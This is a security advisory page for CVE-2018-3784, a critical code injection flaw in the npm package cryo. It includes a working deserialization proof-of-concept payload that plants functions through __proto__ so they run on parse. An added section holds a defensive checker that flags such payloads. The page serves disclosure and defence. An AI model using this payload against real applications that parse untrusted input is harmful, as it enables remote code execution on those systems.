Code Injection in cryo

Critical severity • GitHub Reviewed • Published Aug 21, 2018 to the GitHub Advisory Database • Updated Sep 12, 2023

Package

cryo (npm)

Affected versions

<= 0.0.6

Patched versions

None

Description

All versions of cryo are vulnerable to code injection due to an insecure implementation of deserialization.

Proof of concept

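var Cryo = require('cryo');
// references[0] and [1]: function source carried as strings behind the _CRYO_FUNCTION_ prefix.
// references[2]: object whose toString/valueOf point at those two functions.
// references[3] (the root): object whose __proto__ points at references[2].
var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}';
var hydrated = Cryo.parse(frozen);
console.log(hydrated);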

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.
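
An added example, not part of the advisory or the cryo project: a Node.js check that reads a cryo-format string with JSON.parse only, never Cryo.parse, and reports the markers the proof of concept relies on (serialized functions, `__proto__` keys, and properties that resolve to a serialized function). The name inspectFrozen and both sample strings are constructed for illustration; the marker strings are taken from the payload above.

```javascript
// Added example: inspect a cryo-format string as data only; Cryo.parse is never called.
const FUNCTION_FLAG = '_CRYO_FUNCTION_'; // markers as they appear in the advisory payload
const REF_FLAG = '_CRYO_REF_';

// Constructed samples in the shape of the advisory payload (function body is harmless).
const SAMPLE_BENIGN = '{"root":"_CRYO_REF_0","references":[{"contents":{"name":"alice"},"value":"_CRYO_OBJECT_"}]}';
const SAMPLE_FLAGGED = '{"root":"_CRYO_REF_2","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () { return 1; }"},{"contents":{"toString":"_CRYO_REF_0"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"}]}';

function inspectFrozen(frozen) {
  let doc;
  try {
    doc = JSON.parse(frozen); // builds plain data; no code is evaluated
  } catch (err) {
    return { ok: false, findings: ['not valid JSON: ' + err.message] };
  }
  const findings = [];
  const refs = doc && Array.isArray(doc.references) ? doc.references : [];
  const isFn = (v) => typeof v === 'string' && v.startsWith(FUNCTION_FLAG);

  // Indices of references that carry serialized function source.
  const fnRefs = new Set();
  refs.forEach((ref, i) => { if (ref && isFn(ref.value)) fnRefs.add(i); });
  if (doc && isFn(doc.root)) findings.push('root: serialized function');
  for (const i of fnRefs) findings.push(`references[${i}]: serialized function`);

  refs.forEach((ref, i) => {
    const contents = ref && ref.contents && typeof ref.contents === 'object' ? ref.contents : {};
    // JSON.parse stores "__proto__" as an own key, so Object.keys reports it.
    for (const key of Object.keys(contents)) {
      const val = contents[key];
      if (key === '__proto__') {
        findings.push(`references[${i}]: "__proto__" key set to ${JSON.stringify(val)}`);
      }
      if (typeof val === 'string' && val.startsWith(REF_FLAG)) {
        const target = Number(val.slice(REF_FLAG.length));
        if (fnRefs.has(target)) {
          findings.push(`references[${i}].${key} -> function references[${target}]`);
        }
      }
    }
  });
  return { ok: findings.length === 0, findings };
}

console.log(inspectFrozen(SAMPLE_BENIGN));
console.log(inspectFrozen(SAMPLE_FLAGGED));
```

The check is a triage aid for stored or logged cryo strings; it does not make Cryo.parse safe to call on untrusted input.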

References

Published to the GitHub Advisory Database Aug 21, 2018
Reviewed Jun 16, 2020
Last updated Sep 12, 2023

Severity

Critical 9.8 / 10

CVSS base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2018-3784

GHSA ID

GHSA-38f5-ghc2-fcmv

Source code

No known source code